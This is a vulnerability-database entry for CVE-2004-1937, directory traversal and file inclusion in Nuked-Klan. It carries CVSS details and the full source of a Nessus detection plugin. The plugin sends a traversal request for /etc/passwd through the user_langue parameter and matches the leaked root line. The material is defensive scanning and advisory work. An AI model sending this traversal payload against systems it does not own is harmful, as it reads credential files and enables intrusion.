Vulnerabilities > CVE-2004-1937 - Multiple vulnerabilities in Nuked-Klan

CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE

Summary

Multiple directory traversal vulnerabilities in Nuked-KlaN 1.4b and 1.5b allow remote attackers to read or include arbitrary files via .. sequences in (1) the user_langue parameter to index.php or (2) the langue parameter to update.php, or modify arbitrary GLOBAL variables by causing globals.php to be loaded before conf.inc.php via (3) .. sequences in the file parameter with the page parameter set to globals, or (4) ../globals.php in the user_langue parameter, as demonstrated by modifying $nuked[prefix] in the Suggest module.

Exploit-Db

description: Nuked-Klan 1.x Multiple Vulnerabilities. CVE-2004-1937. Webapps exploit for PHP platform
id: EDB-ID:23988
last seen: 2016-02-02
modified: 2004-04-12
published: 2004-04-12
reporter: frog
source: https://www.exploit-db.com/download/23988/
title: Nuked-Klan 1.x - Multiple Vulnerabilities

Nessus

NASL family: CGI abuses
NASL id: NUKED_KLAN_FILE_INCLUDE.NASL
description: Nuked-klan is installed on the remote host. There is a bug in this version that could allow an attacker to include PHP files hosted on a third-party website, thus allowing an attacker to execute arbitrary commands on this host. Another bug allows an attacker to read arbitrary files on the remote host.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 12202
published: 2004-04-13
reporter: This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/12202
title: Nuked-Klan index.php user_langue Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

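#
# Plugin registration block: metadata the Nessus engine reads when it
# loads the plugin.  Nothing in here touches the target; the detection
# logic follows the includes further down.
#
if (description)
{
  script_id(12202);
  script_version ("1.18");
  script_cve_id("CVE-2004-1937");
  script_bugtraq_id(10104);

  script_name(english:"Nuked-Klan index.php user_langue Parameter Traversal Arbitrary File Access");
  script_summary(english:"Determine if Nuked-klan is vulnerable to a file include attack");

  # The synopsis used to read "prone to a heap-based buffer overflow",
  # which contradicts the title, the description and the traversal check
  # this plugin performs.  It now names the actual weakness class.
  script_set_attribute(
    attribute:'synopsis',
    value:'The remote web server hosts a PHP application that is affected by directory traversal and file inclusion vulnerabilities.'
  );

  script_set_attribute(
    attribute:'description',
    value:"Nuked-klan is installed on the remote host.

There is a bug in this version that could allow an attacker to include
php files hosted on a third-party website, thus allowing an attacker to
execute arbitrary commands on this host.

Another bug allows an attacker to read arbitrary files on the remote host."
  );

  script_set_attribute(
    attribute:'solution',
    value: "Upgrade Nuked-klan to a version newer than 1.5b."
  );

  # NOTE(review): this vector scores partial integrity and availability
  # impact on top of the confidentiality loss.  That matches the
  # include-to-command-execution path claimed in the description rather
  # than the read-only traversal the check below actually probes; confirm
  # that the combined rating is intended.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # Original advisory and its Bugtraq posting.
  script_set_attribute(
    attribute:'see_also',
    value:'https://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt'
  );
  script_set_attribute(
    attribute:'see_also',
    value:'https://marc.info/?l=bugtraq&m=108222826225823&w=2'
  );

  script_set_attribute(attribute:"plugin_publication_date", value: "2004/04/13");
  script_cvs_date("Date: 2018/11/15 20:50:18");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");

  # Run only after service discovery and HTTP fingerprinting, on hosts
  # known to serve PHP, and honour the global "no CGI scanning" switch.
  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}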

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

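# Detection: request index.php with a traversal payload in the user_langue
# parameter and look for the characteristic root entry of /etc/passwd in
# the reply.
port = get_http_port(default:80);

# Nothing to test unless the server can actually run PHP.
if (!can_host_php(port:port)) exit(0);

# /etc/passwd is the probe target, so only UNIX-like hosts are detected;
# a Windows target running Nuked-Klan will not be flagged by this check.
foreach dir (cgi_dirs())
{
  url = string(dir, "/index.php?user_langue=../../../../../../../../../../etc/passwd");
  res = http_send_recv3(method:"GET", item:url, port:port);
  if (isnull(res)) exit(1, "The web server on port "+port+" did not answer");

  # Status line, headers and body are scanned together.
  reply = strcat(res[0], res[1], '\r\n', res[2]);

  # "root:<pw>:0:0:" (gid 0 or 1) is the signature of a leaked passwd file.
  if (egrep(pattern:"root:.*:0:[01]:", string:reply))
  {
    # Give the analyst the exact request that reproduced the leak so the
    # finding can be verified and the affected directory identified.
    if (report_verbosity > 0)
    {
      report = string(
        "\n",
        "Nessus was able to retrieve /etc/passwd with the following request :\n",
        "\n",
        "  ", build_url(port:port, qs:url), "\n"
      );
      security_hole(port:port, extra:report);
    }
    else security_hole(port:port);
    exit(0);
  }
}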